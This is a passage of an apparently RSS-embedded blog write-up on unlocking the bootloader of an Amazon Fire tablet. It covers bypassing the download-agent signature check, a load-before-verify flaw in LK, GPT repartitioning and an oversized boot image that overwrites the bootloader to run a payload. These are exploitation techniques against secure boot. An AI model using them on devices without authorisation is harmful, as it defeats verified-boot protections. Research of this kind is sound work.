&lt;p&gt;We know that &lt;code&gt;aes_write16&lt;/code&gt; and &lt;code&gt;aes_read16&lt;/code&gt; can be used starting from address &lt;code&gt;0x80000000&lt;/code&gt;, so we can technically upload the payload in chunks of 16 bytes and then call it a day!&lt;/p&gt;
&lt;p&gt;Oh, but there&apos;s a catch. As we&apos;ve seen, &lt;code&gt;g_da_verified&lt;/code&gt; is only set to 1 if the DA is signed. After countless hours of trying to bypass this restriction, out of mere desperation, I tried to write to that global variable with &lt;code&gt;CMD_WRITE32&lt;/code&gt; and... it worked! I was able to set it to 1 and jump to my own payload.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[2024-07-21 02:02:21.020854] Waiting for Preloader
[2024-07-21 02:02:40.487613] Found port = /dev/ttyACM0
[2024-07-21 02:02:40.527277] Handshake
[2024-07-21 02:02:40.549432] Disable watchdog
[2024-07-21 02:02:40.549937] Init crypto engine
[2024-07-21 02:02:40.565977] Disable DA verification check
[2024-07-21 02:02:40.566455] Load payload from ../brom-payload/pl/pl.bin = 0x3BB2 bytes
[2024-07-21 02:02:48.838860] Let&apos;s rock
[2024-07-21 02:02:48.839156] Wait for the payload to come online...
[2024-07-21 02:02:50.813918] all good
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code&gt;[PLFM] USB cable in
[TOOL] USB enum timeout (Yes), handshake timeout(Yes)
[USBD] USB Full Speed
[TOOL] Enumeration(Start)
[USBD] USB High Speed
[USBD] USB High Speed
[TOOL] Enumeration(End): OK 537ms 
[TOOL] sync time 277ms
[BLDR] jump to 0x80001000
[BLDR] &amp;lt;0x80001000&amp;gt;=0xFA000025
[BLDR] &amp;lt;0x80001004&amp;gt;=0xB5072300
[R0rt1z2] Hello from the other side!
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;At this point I was able to upload my own payload to the device and execute it. I simply based it on k4y0z&apos;s Preloader based payload for mantis and called it a day.&lt;/p&gt;
&lt;p&gt;As for bootROM, when I tried to dump &lt;code&gt;0x0&lt;/code&gt; (with the payload, that is), I got the following output:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;00000000  04 f0 1f e5 00 10 00 12  04 f0 1f e5 00 10 00 12  |................|
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As we&apos;ve seen before, this is a jump instruction, which in this case redirects execution to &lt;code&gt;0x12001000&lt;/code&gt;. Doesn&apos;t this sound familiar? Yes, it&apos;s where PL1 gets loaded as well. So when I tried to dump that address, I was greeted by PL1 instead of bootROM.&lt;/p&gt;
&lt;p&gt;I haven&apos;t bothered further with this, as it seemed like I hit a dead end. The only way to dump bootROM at this point was to gain arbitrary code execution before PL1 gets loaded, which is fairly complicated.&lt;/p&gt;
&lt;h2&gt;Unlocking the bootloader&lt;/h2&gt;
&lt;p&gt;After successfully gaining direct read/write access to the eMMC, the next step was to find a way to exploit the LK to permanently unlock the bootloader.&lt;/p&gt;
&lt;p&gt;The first idea that came to mind was to use amonet&apos;s microloader, porting it from ford to ariel (considering they&apos;re very similar). However, I wondered, is it going to be that easy? That&apos;s what I was about to find out...&lt;/p&gt;
&lt;p&gt;As explained in my previous article, microloader works by crafting a malicious boot image with a user-controlled kernel load address. This allows it to overwrite a portion of the LK (the one loaded into RAM and running at runtime) with a ROP chain, which is then executed by pivoting the stack.&lt;/p&gt;
&lt;p&gt;This would be perfect... if only it had worked. I did a quick test on my device and was greeted with an image verification failure.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[1250]  &amp;gt; page count of kernel image = 2
[1260] Verifying kernel...
[1260] [HW CRYPTO LK] AXI = 0x0000885b
[1260] [HW CRYPTO LK] AXI = 0x0000885b
[1270] Error: fail to check 0xBC for pkcs_1_pss_decode_sha256 operation
[1270] [VERIFY_BOOTIMG] Error: fail to do pss decode for boot data.
[1280] [MBOOT] Load &apos;Android Boot Image&apos; partition Error
[1290] 
[1290] *******************************************************
[1290] *ERROR.ERROR.ERROR.ERROR.ERROR.ERROR.ERROR.ERROR.ERROR*
[1300] *******************************************************
[1300] &amp;gt; Please check kernel and rootfs in Android Boot Image are both correct.
[1310] *******************************************************
[1310] *ERROR.ERROR.ERROR.ERROR.ERROR.ERROR.ERROR.ERROR.ERROR*
[1320] *******************************************************
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So, what&apos;s going on? Why doesn&apos;t it crash LK instead, considering we&apos;re technically overwriting it? To get to the bottom of this, I decided to reverse engineer my LK image.&lt;/p&gt;
&lt;p&gt;While doing so, I discovered that the load address specified in the header of the boot image is actually ignored. Regardless of what address you choose, the bootloader will always use &lt;code&gt;0x80208000&lt;/code&gt; as the kernel load address.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// ... this is app(). After performing some initializations, 
// LK proceeds to load either a boot image, a recovery image, 
// or a factory image. Under all circumstances, it hardcodes 
// the load address.
ret = mboot_android_load_bootimg_hdr(&quot;boot&quot;, 0x80208000); // header
if (-1 &amp;lt; ret) {
  iVar1 = mboot_android_load_bootimg(&quot;boot&quot;, 0x80208000); // image
  if (ret == -1) {
      msg_img_error(&quot;Android Boot Image&quot;); // error and trigger assert()
  }
}
msg_header_error(&quot;Android Boot Image&quot;); // error and trigger assert()
// ...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As you can see, the second parameter of &lt;code&gt;mboot_android_load_bootimg&lt;/code&gt; (which is the function amonet exploits) is a hardcoded load address. This address is then used to load the kernel into memory:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int mboot_android_load_bootimg(char *part_name, ulong addr) {
    part_dev_t *dev;
    part_t *part;
    int ret;
    uint64_t offset;

    dev = mt_part_get_device();
    if (dev == NULL) {
        dprintf(&quot;mboot_android_load_bootimg , dev = NULL\n&quot;);
        return -0x13;
    }

    part = mt_part_get_partition(part_name);
    if (part == (part_t *)0xffffffff) {
        dprintf(&quot;mboot_android_load_bootimg , part = NULL\n&quot;);
        return -2;
    }

    offset = partition_get_offset((int)part);
    // load whatever the data is to 0x80208000
    ret = dev-&amp;gt;read(dev, addr, (uchar *)addr, (int)offset);

    if (verify_image(1, addr, _DAT_81e6c420, 0) == 0) {
        if (is_prod_device()) {
            FUN_81e3f6a0(&quot;console=tty0 console=ttyMT3,115200n1 root=/dev/ram&quot;, &quot;%s androidboot.prod=1&quot;, &quot;console=tty0 console=ttyMT3,115200n1 root=/dev/ram&quot;);
        } else {
            FUN_81e3f6a0(&quot;console=tty0 console=ttyMT3,115200n1 root=/dev/ram&quot;, &quot;%s androidboot.prod=0&quot;, &quot;console=tty0 console=ttyMT3,115200n1 root=/dev/ram&quot;);
        }
    } else {
        dprintf(&quot;failed to verify boot image. size :0x%x&quot;, _DAT_81e6c420);
        return -5;
    }

    return ret;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If you&apos;re quick enough (unlike me :P), you might have noticed that although the address is hardcoded, the verification of the data is carried out &lt;strong&gt;AFTER&lt;/strong&gt; the image is loaded into memory.&lt;/p&gt;
&lt;p&gt;Great, so how is this helpful to us? Well, this is where math comes in handy. We know that:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;LK&apos;s load address in memory is &lt;code&gt;0x81E00000&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;The kernel load address in memory is &lt;code&gt;0x80208000&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Notice that LK is placed &lt;strong&gt;AFTER&lt;/strong&gt; (sometimes I wonder if MediaTek engineers are just plain stupid) the kernel in the memory stack. This means that, technically, flashing a huge boot image could overwrite the loaded LK data, giving us the ability to execute arbitrary code.&lt;/p&gt;
&lt;p&gt;The difference between the two addresses is &lt;code&gt;0x81E00000 - 0x80208000 = 0x1BF8000&lt;/code&gt;, which is roughly 30 MB. Do you see where I&apos;m going with this?&lt;/p&gt;
&lt;h3&gt;Modifying the GPT&lt;/h3&gt;
&lt;p&gt;This step was quite easy, considering that we did it before in sloane to exploit LK in the same way. In this case, we just had to rename the original &lt;code&gt;recovery&lt;/code&gt; and &lt;code&gt;boot&lt;/code&gt; partitions to &lt;code&gt;recovery_x&lt;/code&gt; and &lt;code&gt;boot_x&lt;/code&gt;, then shrink &lt;code&gt;userdata&lt;/code&gt; and create two &lt;strong&gt;30 MB partitions&lt;/strong&gt; called &lt;code&gt;boot&lt;/code&gt; and &lt;code&gt;recovery&lt;/code&gt; (which are what LK will pick up).&lt;/p&gt;
&lt;p&gt;Since we don&apos;t have much internal memory on ariel (it&apos;s either 8GB - for the HD7 - or 16 GB - for the HD6), I decided to shrink the &lt;code&gt;cache&lt;/code&gt; partition instead, which has a total size of 1GB ~. In any case, the resulting GPT looked like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  Number   Start (sector)     End (sector)  Size          Name
      1               64              319  128.00 KiB    PRO_INFO
      2             2048            10239  4.00 MiB      PMT
      3            10240            20479  5.00 MiB      TEE1
      4            20480            30719  5.00 MiB      TEE2
      5            30720            31743  512.00 KiB    UBOOT
-     6            31744            48127  8.00 MiB      boot
-     7            48128            64511  8.00 MiB      recovery
+     6            31744            48127  8.00 MiB      boot_x
+     7            48128            64511  8.00 MiB      recovery_x
      8            64512            66559  1024.00 KiB   KB
      9            66560            68607  1024.00 KiB   DKB
     10            68608            69631  512.00 KiB    MISC
     11            69632           102399  16.00 MiB     persisbackup
     12           102400          2559999  1.17 GiB      system
-    13          2560000          4239359  1.00 GiB      cache
+    13          2560000          4239359  820.00 MiB    cache
+    14          4239360          4300799  30.00 MiB     boot
+    15          4300800          4362239  30.00 MiB     recovery
     16          4362240         30527454  12.48 GiB     userdata
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;Crafting the malicious boot image&lt;/h3&gt;
&lt;p&gt;Once we had the GPT ready, the next step was to craft a (big enough) boot image that would overwrite LK in memory. On older devices, a ROP chain was used to redirect execution to the payload, but with time we (k4y0z, t0x1cSH and I) realized it wasn&apos;t necessary.&lt;/p&gt;
&lt;p&gt;One could just overwrite a function that gets called before the verification process with a direct jump to the payload. In the case of ariel, I decided to overwrite &lt;code&gt;0x81e099e8&lt;/code&gt;, which is the function used to verify the boot image:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int verify_img(int flag, void *img, uint p3, uint p4) {
    char status = *(char *)(_DAT_81e81258 + 0x16);
    int ret;

    if (status == &apos;\x01&apos;) {
        dprintf(&quot;Device or user build unlocked, or non-user build on engineering device! Skip kernel verification.\n&quot;);
        if (flag != 0) {
            flag = 0;
            sprintf(&quot;console=tty0 console=ttyMT3,115200n1 root=/dev/ram&quot;,
                    &quot;%s androidboot.unlocked_kernel=true&quot;,
                    &quot;console=tty0 console=ttyMT3,115200n1 root=/dev/ram&quot;);
        }
    } else if (status == &apos;\x02&apos;) {
        dprintf(&quot;Verifying kernel with engineering key...\n&quot;);
        ret = verify_img_type(img, p3, 1);
        if (ret != 0) {
            ret = -5;
        }
        return ret;
    } else {
        if (!is_prod_dev()) {
            dprintf(&quot;User build on engineering device. Skip verification.\n&quot;);
            return 0;
        }
        dprintf(&quot;Verifying kernel...\n&quot;);
        ret = verify_img_type(img, p3, 0);
        if (ret == 0) {
            if (flag != 0) {
                flag = 0;
                sprintf(&quot;console=tty0 console=ttyMT3,115200n1 root=/dev/ram&quot;,
                        &quot;%s androidboot.unlocked_kernel=false&quot;,
                        &quot;console=tty0 console=ttyMT3,115200n1 root=/dev/ram&quot;);
            }
            return 0;
        } else {
            flag = -5;
        }
    }
    return flag;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I simply &lt;a href=&quot;https://github.com/R0rt1z2/amonet&quot;&gt;forked sloane&apos;s amonet repository&lt;/a&gt; and modified the &lt;code&gt;create_boot_img.py&lt;/code&gt; script to suit my needs. The result can be found &lt;a href=&quot;https://github.com/R0rt1z2/amonet/blob/mt8135-ariel/lk-payload/create_boot_img.py&quot;&gt;here&lt;/a&gt;, and it generated the following image:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Payload Address: 0x81dff000
Payload Block:   57271
Part Size:       29763948 (28.39 MiB / 58133 Blocks)
Writing ../bin/boot.hdr...
Writing ../bin/boot.payload...
&lt;/code&gt;&lt;/pre&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/meme.jpg&quot; width=&quot;60%&quot; alt=&quot;RE meme&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;Lastly, I modified the bootROM-based Python scripts to automatically patch the GPT, downgrade bootloader images, and flash the payload to the corresponding block.&lt;/p&gt;
&lt;p&gt;It took me a few attempts, but after adjusting some minor details, like using BL instead of BLX (unlike the original sloane exploit), I managed to jump to the payload and unlock the bootloader!&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/hacked-fastboot.jpg&quot; width=&quot;60%&quot; alt=&quot;Hacked fastboot mode&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;The functionality of the payload itself is the same as the one explained in my previous article. I just had to modify some parts to make it compatible with such an old device, such as the dev-read/write operations. You can check the full code &lt;a href=&quot;https://github.com/R0rt1z2/amonet/blob/mt8135-ariel/lk-payload/main.c&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;Demo of the PoC in action&lt;/h2&gt;

&lt;h2&gt;Bonus: LineageOS 12.1&lt;/h2&gt;
&lt;p&gt;Considering how slow FireOS is, I decided it would be a great idea to have a smooth AOSP-based ROM. Since my motivation to build ROMs has been waning over the past few years, I didn&apos;t feel like bringing something newer than the latest stock version. Instead, I decided to build &lt;a href=&quot;https://github.com/lineageos-lollipop&quot;&gt;LineageOS 12.1&lt;/a&gt; (formerly known as CyanogenMod 12.1) and make it as stable as possible.&lt;/p&gt;
&lt;p&gt;After a few weeks of work, I managed to build a pretty solid ROM that runs 200 times faster than FireOS and is much more customizable. As of the time of writing, the only bug the ROM has is video recording, which crashes the Camera application. All the sources used to build both TWRP and LineageOS 12.1 can be found on &lt;a href=&quot;https://github.com/amazon-oss/&quot;&gt;this GitHub organization&lt;/a&gt;.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Screenshot 1&lt;/th&gt;
&lt;th&gt;Screenshot 2&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;img src=&quot;https://cdn.r0rt1z2.com/blog/lineage-01.png&quot; alt=&quot;LineageOS 12.1&quot; /&gt;&lt;/td&gt;
&lt;td&gt;&lt;img src=&quot;https://cdn.r0rt1z2.com/blog/lineage-02.png&quot; alt=&quot;LineageOS 12.1&quot; /&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h2&gt;Conclusions&lt;/h2&gt;
&lt;p&gt;This was a fun journey, and I&apos;m glad I managed to unlock the bootloader and build a custom ROM for the device. This process has helped me acquire a lot of knowledge about MediaTek devices and how they work at a low-level scope.&lt;/p&gt;
&lt;p&gt;I&apos;d like to thank &lt;a href=&quot;https://github.com/chaosmaster&quot;&gt;k4y0z&lt;/a&gt;, &lt;a href=&quot;https://github.com/raffy909&quot;&gt;t0x1cSH&lt;/a&gt;, and &lt;a href=&quot;https://github.com/AntiEngineer&quot;&gt;AntiEngineer&lt;/a&gt; for helping me with this project, both software and hardware-wise. I&apos;d also like to thank &lt;a href=&quot;https://gitlab.com/zeroepoch&quot;&gt;zeroepoch&lt;/a&gt; and &lt;a href=&quot;https://github.com/xyzz&quot;&gt;xyz&lt;/a&gt; for their amazing work on MediaTek devices. Nothing would have been possible without their contributions.&lt;/p&gt;
&lt;p&gt;With this, I&apos;m finishing this article. I hope you enjoyed reading it as much as I enjoyed writing it :)&lt;/p&gt;
</content:encoded></item></channel></rss>